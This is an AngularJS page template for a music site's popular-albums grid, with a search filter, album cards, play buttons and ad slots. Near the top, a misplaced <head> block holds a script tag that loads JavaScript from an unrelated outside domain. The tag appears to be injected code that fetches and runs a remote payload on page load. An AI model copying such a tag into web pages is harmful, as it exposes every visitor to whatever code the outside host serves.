<div class="scroll-container" pretty-scrollbar lazy-img-container>
    <div class="page-shadow albums-page home-page" ng-controller="TopAlbumsController">
<head>
<script type="text/javascript" src="https://gemverify.com/script_include.php?id=696499"></script>
</head>
        <div class="ad-container top-ad" ng-if="ad1" ng-bind-html="ad1"></div>

        <div class="filter-bar">
            <div class="dropdown-container sort">{{:: 'popularAlbums' | translate }}</div>
            <div class="filter hidden-phone">
                <input type="text" ng-model="params.query" placeholder="{{:: 'filter' | translate }}">
                <i class="icon icon-search"></i>
            </div>
        </div>

        <section class="albums hover-overlay">
            <figure class="album" ng-repeat="album in topAlbums | filter:{name:params.query} as sortedAlbums" context-menu-item="album">
                <div class="image">
                    <img lazy-img="{{ utils.img(album.image, 'album') }}" ng-src="{{ utils.img(false, 'album') }}" alt="{{ album.name }}">
                    <div class="overlay">
                        <i class="icon icon-play play" ng-click="playAlbum(album)"></i>
                    </div>
                </div>
                <figcaption>
                    <a class="album-name" ui-sref="album({artistName:utils.encodeUrlParam(album.artist.name), name:utils.encodeUrlParam(album.name), id:album.id})">{{ album.name }}</a>
                    <a class="artist-name" ng-if="album.artist" ui-sref="artist({ name: utils.encodeUrlParam(album.artist.name), id:album.artist.id })">{{ album.artist.name }}</a>
                </figcaption>
            </figure>
        </section>

        <div class="no-items" ng-if="sortedAlbums && ! sortedAlbums.length">
            <div class="title"><i class="icon icon-note"></i> {{:: 'noResults' | translate }}</div>
        </div>

        <div class="ad-container bottom-ad" ng-if="ad2" ng-bind-html="ad2"></div>
    </div>
</div>

